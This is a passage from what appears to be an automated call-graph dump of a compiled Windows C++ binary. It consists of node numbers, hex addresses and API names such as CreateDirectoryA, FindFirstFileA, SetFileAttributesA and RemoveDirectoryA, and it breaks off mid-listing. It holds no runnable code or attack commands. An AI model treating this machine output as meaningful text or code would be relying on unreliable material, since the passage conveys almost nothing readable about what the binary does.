c819f1 20147->20155 20156 c8134b 20147->20156 20163 c8178f std::_Throw_Cpp_error 20147->20163 20170 c7dfb0 15 API calls 20147->20170 20147->20192 20326 c85f50 20147->20326 20344 c86660 20147->20344 20364 c862d0 20147->20364 20382 c85d70 20147->20382 20404 c86110 20147->20404 20422 c83ab0 20147->20422 20152 c7bd60 18 API calls 20148->20152 20149->20096 20172 c8189d std::_Throw_Cpp_error 20149->20172 20153 c7bd60 18 API calls 20150->20153 20151->20098 20171 c8155d std::_Throw_Cpp_error 20152->20171 20153->20157 20154 c81b28 20158 c631c0 std::_Throw_Cpp_error 14 API calls 20154->20158 20159 c636f0 std::_Throw_Cpp_error 15 API calls 20155->20159 20160 c636f0 std::_Throw_Cpp_error 15 API calls 20156->20160 20157->20096 20157->20154 20162 c81b34 20158->20162 20164 c81a0c 20159->20164 20165 c81366 20160->20165 20161 c8f408 ___std_exception_destroy 9 API calls 20166 c818fd 20161->20166 20167 c8f408 ___std_exception_destroy 9 API calls 20162->20167 20163->20106 20163->20119 20168 c7b7b0 18 API calls 20164->20168 20169 c7b7b0 18 API calls 20165->20169 20174 c8f408 ___std_exception_destroy 9 API calls 20166->20174 20175 c81b4a 20167->20175 20176 c81a42 20168->20176 20177 c8139c 20169->20177 20170->20147 20171->20096 20171->20106 20173 c8f408 ___std_exception_destroy 9 API calls 20171->20173 20172->20106 20172->20161 20178 c815ce 20173->20178 20179 c81916 20174->20179 20180 c8f408 ___std_exception_destroy 9 API calls 20175->20180 20181 c66670 17 API calls 20176->20181 20182 c66670 17 API calls 20177->20182 20183 c8f408 ___std_exception_destroy 9 API calls 20178->20183 20186 c81a66 20181->20186 20187 c813c0 20182->20187 20183->20192 20189 c7bd60 18 API calls 20186->20189 20190 c7bd60 18 API calls 20187->20190 20189->20157 20191 c813d5 20190->20191 20191->20096 20194 c813ea std::_Throw_Cpp_error 20191->20194 20192->20094 20192->20106 20192->20114 20193 c8f408 ___std_exception_destroy 9 API calls 20195 c81446 20193->20195 20194->20106 20194->20193 20198 c7b925 20197->20198 20199 c7b850 20197->20199 20202 c76aa0 std::_Throw_Cpp_error 15 API calls 20198->20202 20200 c7b860 20199->20200 20201 c7bd3a 20199->20201 20205 c7b4a0 15 API calls 20200->20205 20204 c63110 std::_Throw_Cpp_error 15 API calls 20201->20204 20203 c7b933 20202->20203 20206 c7b942 20203->20206 20215 c7bb19 20203->20215 20207 c7bd3f 20204->20207 20208 c7b87d 20205->20208 20209 c7bd60 18 API calls 20206->20209 20210 c93500 std::_Throw_Cpp_error 14 API calls 20207->20210 20211 c76aa0 std::_Throw_Cpp_error 15 API calls 20208->20211 20212 c7b951 20209->20212 20213 c7bd44 20210->20213 20214 c7b89a 20211->20214 20215->20215 20219 c634e0 std::_Throw_Cpp_error 15 API calls 20215->20219 20222 c7bb54 20219->20222 20583 c75690 20285->20583 20289 c71339 std::_Throw_Cpp_error 20288->20289 20290 c71319 20288->20290 20289->19917 20290->20289 20291 c93500 std::_Throw_Cpp_error 14 API calls 20290->20291 20292 c71360 20291->20292 20292->19917 20294 c8f3a5 ___std_exception_copy 15 API calls 20293->20294 20295 c76c54 20294->20295 20296 c8f3a5 ___std_exception_copy 15 API calls 20295->20296 20297 c76c7b 20296->20297 20297->19907 20299 c8f3a5 ___std_exception_copy 15 API calls 20298->20299 20300 c83f54 20299->20300 20301 c8f3a5 ___std_exception_copy 15 API calls 20300->20301 20302 c83f7b 20301->20302 20302->20063 20306 c7e0c0 20303->20306 20305 c7dfca std::locale::_Setgloballocale 20305->20077 20307 c7e0f9 20306->20307 20313 c7e128 20306->20313 20308 c7e21a 20307->20308 20311 c7e10b 20307->20311 20323 c7e280 20308->20323 20311->20313 20314 c855d0 20311->20314 20313->20305 20315 c8569f 20314->20315 20317 c855e7 20314->20317 20316 c63750 15 API calls 20315->20316 20318 c856a4 20316->20318 20319 c880b0 15 API calls 20317->20319 20320 c85624 std::_Locinfo::_Locinfo_ctor 20319->20320 20321 c85674 std::_Throw_Cpp_error 20320->20321 20322 c93500 std::_Throw_Cpp_error 14 API calls 20320->20322 20321->20313 20322->20315 20324 c8c579 std::_Throw_Cpp_error 15 API calls 20323->20324 20325 c7e28a 20324->20325 20327 c85f8e 20326->20327 20328 c85fb5 20327->20328 20329 c85ffe 20327->20329 20330 c86106 20327->20330 20328->20147 20333 c8602c 20329->20333 20334 c8606e 20329->20334 20337 c86015 20329->20337 20331 c8c53c 15 API calls 20330->20331 20332 c8610b 20331->20332 20335 c71940 15 API calls 20333->20335 20334->20337 20338 c8609a 20334->20338 20339 c8607d 20334->20339 20335->20337 20336 c71940 15 API calls 20336->20328 20337->20336 20341 c83ab0 15 API calls 20338->20341 20444 c75460 20339->20444 20342 c860b6 20341->20342 20342->20337 20343 c71960 15 API calls 20342->20343 20343->20337 20345 c8669e 20344->20345 20346 c866c5 20345->20346 20347 c75ab0 15 API calls 20345->20347 20346->20147 20348 c866e9 20347->20348 20349 c8670b 20348->20349 20350 c86813 20348->20350 20353 c86739 20349->20353 20354 c8677b 20349->20354 20359 c86722 20349->20359 20351 c8c53c 15 API calls 20350->20351 20352 c86818 20351->20352 20355 c71940 15 API calls 20353->20355 20357 c8678a 20354->20357 20358 c867a7 20354->20358 20354->20359 20355->20359 20356 c71940 15 API calls 20356->20346 20360 c75460 15 API calls 20357->20360 20361 c83ab0 15 API calls 20358->20361 20359->20356 20360->20359 20362 c867c3 20361->20362 20362->20359 20363 c71960 15 API calls 20362->20363 20363->20359 20365 c8630e 20364->20365 20366 c86335 20365->20366 20367 c86488 20365->20367 20368 c86380 20365->20368 20366->20147 20369 c8c53c 15 API calls 20367->20369 20371 c86397 20368->20371 20372 c863ae 20368->20372 20373 c863f0 20368->20373 20370 c8648d 20369->20370 20375 c71940 15 API calls 20371->20375 20374 c71940 15 API calls 20372->20374 20373->20371 20376 c8641c 20373->20376 20377 c863ff 20373->20377 20374->20371 20375->20366 20379 c83ab0 15 API calls 20376->20379 20378 c75460 15 API calls 20377->20378 20378->20371 20380 c86438 20379->20380 20380->20371 20381 c71960 15 API calls 20380->20381 20381->20371 20383 c85dae 20382->20383 20384 c85dd5 20383->20384 20385 c8df02 std::_Facet_Register 15 API calls 20383->20385 20384->20147 20386 c85df7 20385->20386 20387 c74090 std::_Throw_Cpp_error 15 API calls 20386->20387 20388 c85e16 20387->20388 20389 c85f49 20388->20389 20392 c85e41 20388->20392 20390 c8c53c 15 API calls 20389->20390 20391 c85f4e 20390->20391 20393 c85e6f 20392->20393 20394 c85eb1 20392->20394 20397 c85e58 20392->20397 20395 c71940 15 API calls 20393->20395 20394->20397 20398 c85edd 20394->20398 20399 c85ec0 20394->20399 20395->20397 20396 c71940 15 API calls 20396->20384 20397->20396 20401 c83ab0 15 API calls 20398->20401 20400 c75460 15 API calls 20399->20400 20400->20397 20402 c85ef9 20401->20402 20402->20397 20403 c71960 15 API calls 20402->20403 20403->20397 20405 c8614e 20404->20405 20406 c86175 20405->20406 20407 c862c8 20405->20407 20408 c861c0 20405->20408 20406->20147 20409 c8c53c 15 API calls 20407->20409 20411 c861d7 20408->20411 20412 c861ee 20408->20412 20414 c86230 20408->20414 20410 c862cd 20409->20410 20415 c71940 15 API calls 20411->20415 20413 c71940 15 API calls 20412->20413 20413->20411 20414->20411 20416 c8625c 20414->20416 20417 c8623f 20414->20417 20415->20406 20419 c83ab0 15 API calls 20416->20419 20418 c75460 15 API calls 20417->20418 20418->20411 20420 c86278 20419->20420 20420->20411 20421 c71960 15 API calls 20420->20421 20421->20411 20423 c83afa 20422->20423 20424 c83b8e 20423->20424 20425 c7e280 15 API calls 20423->20425 20424->20147 20426 c83bd9 20425->20426 20428 c66410 15 API calls 20427->20428 20429 c670f9 20428->20429 20430 c76aa0 std::_Throw_Cpp_error 15 API calls 20429->20430 20433 c67117 std::_Throw_Cpp_error 20430->20433 20431 c671be std::_Throw_Cpp_error 20432 c67258 20433->20431 20433->20432 20441 c8c54a Concurrency::cancel_current_task 20440->20441 20550 c8c305 20441->20550 20443 c8c56a Concurrency::cancel_current_task 20445 c7546f 20444->20445 20446 c7549d 20444->20446 20445->20337 20449 c80ac0 20446->20449 20450 c80b93 20449->20450 20451 c80ae4 20449->20451 20452 c63750 15 API calls 20450->20452 20468 c80d10 20451->20468 20453 c80b98 20452->20453 20455 c80ca9 20453->20455 20456 c80bdd 20453->20456 20469 c80d59 20468->20469 20470 c80d19 20468->20470 20469->20469 20470->20469 20471 c8df02 std::_Facet_Register 15 API calls 20470->20471 20473 c80d30 20470->20473 20471->20473 20551 c638e0 std::regex_error::regex_error 15 API calls 20550->20551 20552 c8c317 20551->20552 20552->20443 20584 c756c9 20583->20584 20589 c75710 20583->20589 20585 c756f2 20584->20585 20588 c75a14 20584->20588 20617 c7a1c0 20584->20617 20587 c7590a 20589->20588 20593 c7a1c0 15 API calls 20589->20593 20602 c7573b 20589->20602 20609 c75705 20589->20609 20592 c71940 15 API calls 20592->20609 20593->20602 20602->20609 20608 c80ac0 15 API calls 20608->20609 20609->20587 20609->20592 20609->20608 20637 c7a250 20609->20637 20618 c7a23c 20617->20618 20619 c7a1dc 20617->20619 20651 c7b289 20650->20651 20652 c7b2a9 std::_Throw_Cpp_error 20650->20652 20651->20652 20653 c93500 std::_Throw_Cpp_error 14 API calls 20651->20653 20652->19946 20654 c7b2d0 20653->20654 20654->19946 20656 cb36b7 20655->20656 20658 cb34a1 std::_Throw_Cpp_error 20655->20658 20656->18406 20659 cb35d8 std::_Throw_Cpp_error std::locale::_Setgloballocale 20658->20659 20662 c93040 20658->20662 20671 c635b0 20658->20671 20659->20656 20660 c635b0 15 API calls 20659->20660 20660->20659 20663 c93073 20662->20663 20664 c93057 20662->20664 20665 ca46d2 __Getctype 14 API calls 20663->20665 20664->20658 20666 c93078 20665->20666 20667 ca49bd __Getctype 14 API calls 20666->20667 20668 c93088 20667->20668 20668->20664 20669 ca42c9 16 API calls 20668->20669 20670 c930ba 20669->20670 20670->20658 20672 c635d5 20671->20672 20673 c636e2 20671->20673 20674 c635ef 20672->20674 20676 c63634 20672->20676 20675 c63750 15 API calls 20673->20675 20677 c636e7 20674->20677 20678 c8df02 std::_Facet_Register 15 API calls 20674->20678 20675->20677 20680 c8df02 std::_Facet_Register 15 API calls 20676->20680 20683 c635ff std::_Locinfo::_Locinfo_ctor 20676->20683 20679 c63070 Concurrency::cancel_current_task 15 API calls 20677->20679 20678->20683 20681 c636ec 20679->20681 20680->20683 20682 c93500 std::_Throw_Cpp_error 14 API calls 20682->20673 20683->20682 20684 c636b3 std::_Throw_Cpp_error 20683->20684 20684->20658 20686 c8d907 20685->20686 20687 c8dedd GetSystemTimePreciseAsFileTime 20685->20687 20686->17852 20687->20686 20812 c76210 20813 c76219 20812->20813 20816 c76254 std::_Throw_Cpp_error 20812->20816 20829 c79620 20813->20829 20817 c93500 std::_Throw_Cpp_error 14 API calls 20818 c7627c 20817->20818 20819 c64670 std::_Throw_Cpp_error 15 API calls 20818->20819 20820 c76321 20819->20820 20821 c8df02 std::_Facet_Register 15 API calls 20820->20821 20822 c76328 20821->20822 20823 c8cfb9 std::_Throw_Cpp_error 17 API calls 20822->20823 20824 c7633b 20823->20824 20825 c777f0 std::_Throw_Cpp_error 21 API calls 20824->20825 20826 c7636e 20825->20826 20827 c763b2 20826->20827 20828 c64670 std::_Throw_Cpp_error 15 API calls 20826->20828 20828->20827 20830 c76222 20829->20830 20831 c7962a std::_Throw_Cpp_error 20829->20831 20830->20816 20830->20817 20831->20830 20832 c93500 std::_Throw_Cpp_error 14 API calls 20831->20832 20833 c7967f 20832->20833 20855 c86ed0 20856 c86f0e 20855->20856 20857 c86fcf 20855->20857 20858 c8df02 std::_Facet_Register 15 API calls 20856->20858 20860 c63260 std::_Throw_Cpp_error 15 API calls 20857->20860 20859 c86f23 20858->20859 20876 c894f0 20859->20876 20861 c86fdd 20860->20861 20888 c77fd0 20861->20888 20864 c86f66 20866 c86f7d 20864->20866 20868 c7a250 15 API calls 20864->20868 20870 c7a250 15 API calls 20866->20870 20868->20866 20869 c87007 Concurrency::cancel_current_task 20871 c8df02 std::_Facet_Register 15 API calls 20869->20871 20872 c86faf std::_Throw_Cpp_error 20870->20872 20873 c8704e 20871->20873 20874 c634e0 std::_Throw_Cpp_error 15 API calls 20873->20874 20875 c87092 20874->20875 20877 c896d3 20876->20877 20887 c89530 std::_Throw_Cpp_error 20876->20887 20877->20864 20878 c719d0 15 API calls 20878->20887 20879 c74090 15 API calls std::_Throw_Cpp_error 20879->20887 20880 c896ee 20905 c663c0 20880->20905 20882 c8df02 std::_Facet_Register 15 API calls 20882->20887 20883 c896f3 20885 c93500 std::_Throw_Cpp_error 14 API calls 20883->20885 20884 c71940 15 API calls 20884->20887 20886 c896f8 20885->20886 20886->20864 20887->20877 20887->20878 20887->20879 20887->20880 20887->20882 20887->20883 20887->20884 20889 c77fe2 20888->20889 20890 c7c4c0 17 API calls 20889->20890 20891 c77ff6 20890->20891 20892 c66e90 20891->20892 20893 c66410 15 API calls 20892->20893 20894 c66f0b 20893->20894 20895 c76aa0 std::_Throw_Cpp_error 15 API calls 20894->20895 20896 c66f29 std::_Throw_Cpp_error 20895->20896 20897 c6706a 20896->20897 20900 c66fd0 std::_Throw_Cpp_error 20896->20900 20899 c93500 std::_Throw_Cpp_error 14 API calls 20897->20899 20898 c8f3a5 ___std_exception_copy 15 API calls 20902 c67015 20898->20902 20899->20902 20900->20898 20901 c6704b std::_Throw_Cpp_error 20901->20869 20902->20901 20903 c93500 std::_Throw_Cpp_error 14 API calls 20902->20903 20904 c67074 20903->20904 20906 c8c579 std::_Throw_Cpp_error 15 API calls 20905->20906 20907 c663ca 20906->20907 20907->20883 20908 cbb010 20909 cbb078 20908->20909 20998 c77ea0 20909->20998 20911 cbb127 CreateDirectoryA 20912 cbc246 20911->20912 20992 cbb155 std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor 20911->20992 20915 c77ea0 15 API calls 20912->20915 20919 cbd50f std::_Throw_Cpp_error 20912->20919 20913 cbc218 20916 c74090 std::_Throw_Cpp_error 15 API calls 20913->20916 20914 cbd549 std::_Throw_Cpp_error 20917 cbc308 CreateDirectoryA 20915->20917 20926 cbc229 20916->20926 20927 cbd4dc 20917->20927 20995 cbc330 std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor 20917->20995 20918 cbdac6 20920 c63110 std::_Throw_Cpp_error 15 API calls 20918->20920 20919->20914 20921 c93500 std::_Throw_Cpp_error 14 API calls 20919->20921 20923 cbdadf 20920->20923 20924 cbdb65 20921->20924 20922 cbd4ae 20928 c74090 std::_Throw_Cpp_error 15 API calls 20922->20928 20925 c93500 std::_Throw_Cpp_error 14 API calls 20923->20925 20935 c74090 std::_Throw_Cpp_error 15 API calls 20924->20935 20936 cbdbc8 20924->20936 20930 cbdae4 20925->20930 20926->20912 21008 d52870 20926->21008 20927->20919 20932 c93500 std::_Throw_Cpp_error 14 API calls 20927->20932 20939 cbd4bf 20928->20939 20929 cbdb02 20933 c63110 std::_Throw_Cpp_error 15 API calls 20929->20933 20934 c63110 std::_Throw_Cpp_error 15 API calls 20930->20934 20932->20919 20937 cbdb1b 20933->20937 20938 cbdae9 20934->20938 20935->20936 20940 c93500 std::_Throw_Cpp_error 14 API calls 20937->20940 20941 c93500 std::_Throw_Cpp_error 14 API calls 20938->20941 20939->20927 20943 d52870 29 API calls 20939->20943 20944 cbdb20 20940->20944 20945 cbdaee 20941->20945 20942 c636f0 15 API calls std::_Throw_Cpp_error 20942->20992 20943->20927 20946 c8cdc4 std::_Throw_Cpp_error 21 API calls 20944->20946 20947 c63110 std::_Throw_Cpp_error 15 API calls 20945->20947 20948 cbdb27 20946->20948 20949 cbdaf3 20947->20949 20950 c8cdc4 std::_Throw_Cpp_error 21 API calls 20948->20950 20951 c63110 std::_Throw_Cpp_error 15 API calls 20949->20951 20952 cbdb38 20950->20952 20953 cbdaf8 20951->20953 20954 c63110 std::_Throw_Cpp_error 15 API calls 20952->20954 20955 c63110 std::_Throw_Cpp_error 15 API calls 20953->20955 20957 cbdb3d 20954->20957 20956 cbdafd 20955->20956 20958 c93500 std::_Throw_Cpp_error 14 API calls 20956->20958 20959 c93500 std::_Throw_Cpp_error 14 API calls 20957->20959 20958->20929 20960 cbdb42 20959->20960 20961 c63110 std::_Throw_Cpp_error 15 API calls 20960->20961 20962 cbdb47 20961->20962 20964 c63110 std::_Throw_Cpp_error 15 API calls 20962->20964 20963 c7b4a0 15 API calls 20963->20992 20965 cbdb4c 20964->20965 20967 c93500 std::_Throw_Cpp_error 14 API calls 20965->20967 20966 c76aa0 15 API calls std::_Throw_Cpp_error 20966->20992 20968 cbdb51 20967->20968 20969 c63110 std::_Throw_Cpp_error 15 API calls 20968->20969 20970 cbdb56 20969->20970 20972 c93500 std::_Throw_Cpp_error 14 API calls 20970->20972 20971 c76aa0 15 API calls std::_Throw_Cpp_error 20971->20995 20972->20927 20973 cbb6bf CreateDirectoryA 20973->20992 20974 c8d429 GetSystemTimePreciseAsFileTime 20974->20995 20975 cbc8f6 CreateDirectoryA 20975->20995 20976 cbc8b1 GetFileAttributesA 20977 cbc8bd GetLastError 20976->20977 20978 cbc8ad 20976->20978 20977->20978 20978->20975 20978->20976 20978->20995 20979 c631c0 14 API calls std::_Throw_Cpp_error 20979->20992 20980 d52cd0 42 API calls 20980->20992 20981 cbb8db CreateDirectoryA 20981->20992 20982 d52cd0 42 API calls 20982->20995 20983 cbcb3b CreateDirectoryA 20983->20995 20984 c634e0 std::_Throw_Cpp_error 15 API calls 20984->20992 20986 c634e0 std::_Throw_Cpp_error 15 API calls 20986->20995 20987 cbba60 CreateDirectoryA 20987->20992 20988 c7b310 15 API calls 20988->20992 20989 c73df0 15 API calls 20989->20992 20990 c7b4a0 15 API calls 20990->20995 20991 c7b310 15 API calls 20991->20995 20992->20913 20992->20918 20992->20923 20992->20930 20992->20938 20992->20942 20992->20945 20992->20949 20992->20953 20992->20956 20992->20963 20992->20966 20992->20973 20992->20979 20992->20980 20992->20981 20992->20984 20992->20987 20992->20988 20992->20989 21049 c78040 20992->21049 20993 c73df0 15 API calls 20993->20995 20994 c631c0 14 API calls std::_Throw_Cpp_error 20994->20995 20995->20922 20995->20929 20995->20937 20995->20944 20995->20948 20995->20952 20995->20957 20995->20960 20995->20962 20995->20965 20995->20968 20995->20970 20995->20971 20995->20974 20995->20978 20995->20982 20995->20983 20995->20986 20995->20990 20995->20991 20995->20993 20995->20994 20996 cbd1e1 CreateDirectoryA 20995->20996 20997 c636f0 15 API calls std::_Throw_Cpp_error 20995->20997 20996->20995 20997->20995 20999 c77ec0 20998->20999 20999->20999 21000 c77ef6 20999->21000 21001 c77ed5 20999->21001 21002 c63110 std::_Throw_Cpp_error 15 API calls 21000->21002 21004 c7b4a0 15 API calls 21001->21004 21003 c77efb 21002->21003 21006 c76aa0 std::_Throw_Cpp_error 15 API calls 21003->21006 21005 c77eee 21004->21005 21005->20911 21007 c77f27 21006->21007 21007->20911 21009 c8d429 GetSystemTimePreciseAsFileTime 21008->21009 21010 d528b7 21009->21010 21011 d52c44 21010->21011 21012 d528c2 21010->21012 21015 c8cdc4 std::_Throw_Cpp_error 21 API calls 21011->21015 21013 d528d2 21012->21013 21014 d52c4b 21012->21014 21016 d52c5c 21013->21016 21019 c7b4a0 15 API calls 21013->21019 21017 c8cdc4 std::_Throw_Cpp_error 21 API calls 21014->21017 21015->21014 21018 c63110 std::_Throw_Cpp_error 15 API calls 21016->21018 21017->21016 21020 d52b65 std::_Throw_Cpp_error 21018->21020 21025 d52930 std::_Throw_Cpp_error 21019->21025 21021 c93500 std::_Throw_Cpp_error 14 API calls 21020->21021 21035 d52c06 std::_Throw_Cpp_error 21020->21035 21023 d52c66 21021->21023 21022 d52964 FindFirstFileA 21022->21020 21046 d529a0 std::_Throw_Cpp_error 21022->21046 21024 c8d429 GetSystemTimePreciseAsFileTime 21023->21024 21026 d52c7d 21024->21026 21025->21020 21025->21022 21027 d52c84 21026->21027 21028 d52cab 21026->21028 21029 d52c90 CreateDirectoryA 21027->21029 21030 d52cb2 21027->21030 21031 c8cdc4 std::_Throw_Cpp_error 21 API calls 21028->21031 21032 d52ca4 21029->21032 21034 c8cdc4 std::_Throw_Cpp_error 21 API calls 21030->21034 21031->21030 21032->20912 21033 d52b20 FindNextFileA 21036 d52b37 GetLastError 21033->21036 21033->21046 21037 d52cc3 21034->21037 21035->20912 21036->21020 21040 d52b4b SetFileAttributesA 21036->21040 21039 c7b4a0 15 API calls 21039->21046 21040->21020 21042 d52b70 RemoveDirectoryA 21040->21042 21042->21020 21043 c76aa0 std::_Throw_Cpp_error 15 API calls 21043->21046 21045 c631c0 std::_Throw_Cpp_error 14 API calls 21045->21046 21046->21016 21046->21020 21046->21033 21046->21039 21046->21043 21046->21045 21047 d52870 22 API calls 21046->21047 21048 d52b8e GetLastError 21046->21048 21047->21046 21048->21020 21050 c78058 21049->21050 21051 c76aa0 std::_Throw_Cpp_error 15 API calls 21050->21051 21052 c78063 21051->21052 21052->20992 21053 cba790 21054 cba7dd 21053->21054 21057 cba98b 21053->21057 21055 cbaffa 21054->21055 21056 cba88a 21054->21056 21059 c63110 std::_Throw_Cpp_error 15 API calls 21055->21059 21058 c7b4a0 15 API calls 21056->21058 21060 cbb004 21057->21060 21061 cbaa34 21057->21061 21062 cba8b3 21058->21062 21063 cbafff 21059->21063 21065 c63110 std::_Throw_Cpp_error 15 API calls 21060->21065 21064 c7b4a0 15 API calls 21061->21064 21066 cba8fc 21062->21066 21175 c7eb10 21062->21175 21067 c93500 std::_Throw_Cpp_error 14 API calls 21063->21067 21068 cbaa5d 21064->21068 21069 cbaa72 21065->21069 21167 d52150 21066->21167 21067->21060 21072 c74090 std::_Throw_Cpp_error 15 API calls 21068->21072 21070 c93500 std::_Throw_Cpp_error 14 API calls 21069->21070 21078 cbaaaa std::_Throw_Cpp_error 21069->21078 21077 cbb00e 21070->21077 21072->21069 21075 cba95f std::_Throw_Cpp_error 21076 c631c0 std::_Throw_Cpp_error 14 API calls 21075->21076 21076->21057 21079 c77ea0 15 API calls 21077->21079 21080 cbb127 CreateDirectoryA 21079->21080 21081 cbc246 21080->21081 21155 cbb155 std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor 21080->21155 21084 c77ea0 15 API calls 21081->21084 21088 cbd50f std::_Throw_Cpp_error 21081->21088 21082 cbc218 21085 c74090 std::_Throw_Cpp_error 15 API calls 21082->21085 21083 cbd549 std::_Throw_Cpp_error 21086 cbc308 CreateDirectoryA 21084->21086 21095 cbc229 21085->21095 21096 cbd4dc 21086->21096 21150 cbc330 std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor 21086->21150 21087 cbdac6 21089 c63110 std::_Throw_Cpp_error 15 API calls 21087->21089 21088->21083 21090 c93500 std::_Throw_Cpp_error 14 API calls 21088->21090 21092 cbdadf 21089->21092 21093 cbdb65 21090->21093 21091 cbd4ae 21097 c74090 std::_Throw_Cpp_error 15 API calls 21091->21097 21094 c93500 std::_Throw_Cpp_error 14 API calls 21092->21094 21105 c74090 std::_Throw_Cpp_error 15 API calls 21093->21105 21106 cbdbc8 21093->21106 21100 cbdae4 21094->21100 21095->21081 21101 d52870 29 API calls 21095->21101 21096->21088 21102 c93500 std::_Throw_Cpp_error 14 API calls 21096->21102 21109 cbd4bf 21097->21109 21098 cbdb02 21103 c63110 std::_Throw_Cpp_error 15 API calls 21098->21103 21099 c636f0 15 API calls std::_Throw_Cpp_error 21099->21155 21104 c63110 std::_Throw_Cpp_error 15 API calls 21100->21104 21101->21081 21102->21088 21107 cbdb1b 21103->21107 21108 cbdae9 21104->21108 21105->21106 21110 c93500 std::_Throw_Cpp_error 14 API calls 21107->21110 21111 c93500 std::_Throw_Cpp_error 14 API calls 21108->21111 21109->21096 21112 d52870 29 API calls 21109->21112 21113 cbdb20 21110->21113 21114 cbdaee 21111->21114 21112->21096 21115 c8cdc4 std::_Throw_Cpp_error 21 API calls 21113->21115 21116 c63110 std::_Throw_Cpp_error 15 API calls 21114->21116 21117 cbdb27 21115->21117 21118 cbdaf3 21116->21118 21119 c8cdc4 std::_Throw_Cpp_error 21 API calls 21117->21119 21120 c63110 std::_Throw_Cpp_error 15 API calls 21118->21120 21122 cbdb38 21119->21122 21123 cbdaf8 21120->21123 21121 c636f0 15 API calls std::_Throw_Cpp_error 21121->21150 21124 c63110 std::_Throw_Cpp_error 15 API calls 21122->21124 21125 c63110 std::_Throw_Cpp_error 15 API calls 21123->21125 21127 cbdb3d 21124->21127 21126 cbdafd 21125->21126 21128 c93500 std::_Throw_Cpp_error 14 API calls 21126->21128 21129 c93500 std::_Throw_Cpp_error 14 API calls 21127->21129 21128->21098 21130 cbdb42 21129->21130 21131 c63110 std::_Throw_Cpp_error 15 API calls 21130->21131 21132 cbdb47 21131->21132 21133 c63110 std::_Throw_Cpp_error 15 API calls 21132->21133 21134 cbdb4c 21133->21134 21135 c93500 std::_Throw_Cpp_error 14 API calls 21134->21135 21136 cbdb51 21135->21136 21138 c63110 std::_Throw_Cpp_error 15 API calls 21136->21138 21137 c7b4a0 15 API calls 21137->21150 21139 cbdb56 21138->21139 21140 c93500 std::_Throw_Cpp_error 14 API calls 21139->21140 21140->21096 21141 cbb6bf CreateDirectoryA 21141->21155 21142 c8d429 GetSystemTimePreciseAsFileTime 21142->21150 21143 c76aa0 15 API calls std::_Throw_Cpp_error 21143->21155 21144 cbc8f6 CreateDirectoryA 21144->21150 21145 cbc8b1 GetFileAttributesA 21146 cbc8bd GetLastError 21145->21146 21147 cbc8ad 21145->21147 21146->21147 21147->21144 21147->21145 21147->21150 21148 cbb8db CreateDirectoryA 21148->21155 21149 c76aa0 15 API calls std::_Throw_Cpp_error 21149->21150 21150->21091 21150->21098 21150->21107 21150->21113 21150->21117 21150->21121 21150->21122 21150->21127 21150->21130 21150->21132 21150->21134 21150->21136 21150->21137 21150->21139 21150->21142 21150->21147 21150->21149 21152 cbcb3b CreateDirectoryA 21150->21152 21156 c634e0 std::_Throw_Cpp_error 15 API calls 21150->21156 21161 c7b310 15 API calls 21150->21161 21162 d52cd0 42 API calls 21150->21162 21164 c631c0 14 API calls std::_Throw_Cpp_error 21150->21164 21165 c73df0 15 API calls 21150->21165 21166 cbd1e1 CreateDirectoryA 21150->21166 21151 c7b4a0 15 API calls 21151->21155 21152->21150 21153 c634e0 std::_Throw_Cpp_error 15 API calls 21153->21155 21154 c78040 15 API calls 21154->21155 21155->21082 21155->21087 21155->21092 21155->21099 21155->21100 21155->21108 21155->21114 21155->21118 21155->21123 21155->21126 21155->21141 21155->21143 21155->21148 21155->21151 21155->21153 21155->21154 21157 cbba60 CreateDirectoryA 21155->21157 21158 c7b310 15 API calls 21155->21158 21159 c73df0 15 API calls 21155->21159 21160 c631c0 14 API calls std::_Throw_Cpp_error 21155->21160 21163 d52cd0 42 API calls 21155->21163 21156->21150 21157->21155 21158->21155 21159->21155 21160->21155 21161->21150 21162->21150 21163->21155 21164->21150 21165->21150 21166->21150 21168 d5218f 21167->21168 21169 d52197 GetSystemMetrics GetSystemMetrics 21168->21169 21171 cba92c 21168->21171 21170 d521b1 21169->21170 21170->21171 21172 c9cc7c ___std_exception_copy 10 API calls 21170->21172 21171->21063 21171->21075 21174 d5224a 21172->21174 21173 c9c526 ___std_exception_destroy 9 API calls 21173->21171 21174->21171 21174->21173 21176 c7ebbc 21175->21176 21179 c7eb38 21175->21179 21177 c63110 std::_Throw_Cpp_error 15 API calls 21176->21177 21182 c7ebc1 21177->21182 21178 c7ebfc 21178->21066 21181 c7eb67 21179->21181 21192 c80a50 21179->21192 21181->21066 21182->21178 21207 c7c450 21182->21207 21184 c7eca9 21213 c83c30 21184->21213 21188 c93500 std::_Throw_Cpp_error 14 API calls 21191 c7eebe 21188->21191 21189 c7ee9c std::_Throw_Cpp_error 21189->21066 21190 c7ecdf std::_Throw_Cpp_error std::locale::_Setgloballocale 21190->21188 21190->21189 21191->21066 21193 c80aa8 21192->21193 21194 c80a62 21192->21194 21197 c63070 Concurrency::cancel_current_task 15 API calls 21193->21197 21195 c80a6b 21194->21195 21196 c80a8f 21194->21196 21195->21193 21198 c80a72 21195->21198 21199 c80aa1 21196->21199 21201 c8df02 std::_Facet_Register 15 API calls 21196->21201 21204 c80a78 21197->21204 21200 c8df02 std::_Facet_Register 15 API calls 21198->21200 21199->21181 21200->21204 21205 c80a99 21201->21205 21202 c93500 std::_Throw_Cpp_error 14 API calls 21203 c80ab2 21202->21203 21204->21202 21206 c80a81 21204->21206 21205->21181 21206->21181 21208 c7c46b 21207->21208 21209 c7c478 21207->21209 21208->21184 21210 c7c496 std::locale::_Setgloballocale 21209->21210 21230 c85390 21209->21230 21210->21184 21212 c7c48f 21212->21184 21214 c83c74 21213->21214 21216 c83ca6 21213->21216 21217 c7dfb0 15 API calls 21214->21217 21215 c7eccb 21215->21190 21219 c8a420 21215->21219 21216->21215 21269 c841a0 21216->21269 21217->21215 21220 c8a4fb 21219->21220 21221 c8a437 21219->21221 21222 c63750 15 API calls 21220->21222 21288 c89ef0 21221->21288 21223 c8a500 21222->21223 21296 c8b170 21223->21296 21226 c8a522 21226->21190 21227 c8a4d0 std::_Throw_Cpp_error 21227->21190 21228 c8a474 std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 21228->21227 21229 c93500 std::_Throw_Cpp_error 14 API calls 21228->21229 21229->21220 21231 c854ac 21230->21231 21236 c853a7 21230->21236 21232 c63750 15 API calls 21231->21232 21253 c85404 std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 21232->21253 21233 c854a7 21234 c63070 